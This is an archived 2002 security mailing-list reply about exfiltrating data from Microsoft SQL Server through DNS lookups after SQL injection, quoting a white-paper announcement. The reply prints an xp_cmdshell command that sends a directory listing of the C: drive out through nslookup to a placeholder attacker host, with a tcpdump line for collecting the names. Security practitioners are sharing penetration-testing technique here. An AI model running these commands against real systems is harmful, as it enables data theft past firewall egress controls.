Re: Manipulating Microsoft SQL Server Using SQL Injection (+ DNS Tunnels) (fwd)

From: Haroon Meer (haroonat_private)
Date: Tue Sep 03 2002 - 03:07:00 PDT

Next message: Alfred Huger: "Administrivia"

Previous message: Talisker: "SUMMARY: Wireless Security Tools"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi.

Nice paper :> We have found that outgoing connections are almost always
blocked (especially from SQL servers that are a little deeper in the DMZ
than the 'net facing webservers). (DNS requests often slip by)

If you can execute commands remotely (through ur xp_ of choice) then you
can use batch commands to throw together a simple DNS tunnel.

Example..
-snip-
exec master..xp_cmdshell 'for /F "usebackq tokens=1,2,3,4*" %i in (`dir
c:\*.`) do (nslookup %l. YOUR_IP_HERE)'

Running a sniffer on host YOUR_IP_HERE (with an awk / split or two)

Wh00t:~# tcpdump -l dst YOUR_IP_HERE and port 53 | awk '{print $7}'

.
WINNT.
tools.
bytes

-snip-

If outgoing dns isnt allowed directly, you can still have some joy
requesting %variable.DOMAIN_U_CAN_SNIFF.com and letting it follow its DNS
path..

======================================================================
Haroon Meer                                                         MH
SensePost Information Security                          +27 83786 6637
PGP : http://www.sensepost.com/pgp/haroon.txt     haroonat_private
======================================================================

On Wed, 28 Aug 2002, Aaron C. Newman wrote:

> Hi All,
>
> I just posted a short white paper on Microsoft SQL Server and SQL
> Injection titled "Manipulating Microsoft SQL Server Using SQL Injection"
> at:
>
> http://www.appsecinc.com/news/briefing.html#inject14
>
> The paper was written and researched by Cesar Cerrudo
> (sqlsecat_private).
>
> All comments are welcome.
>
> Regards,
> Aaron
> _______________________________
> Aaron C. Newman
> anewmanat_private
> CTO/Founder
> Application Security, Inc.
> www.appsecinc.com
> Phone: 212-490-6022
> Fax: 212-490-6456
> - Protection Where It Counts -
>
>
>
>




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Alfred Huger: "Administrivia"
Previous message: Talisker: "SUMMARY: Wireless Security Tools"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 02 2002 - 22:00:07 PDT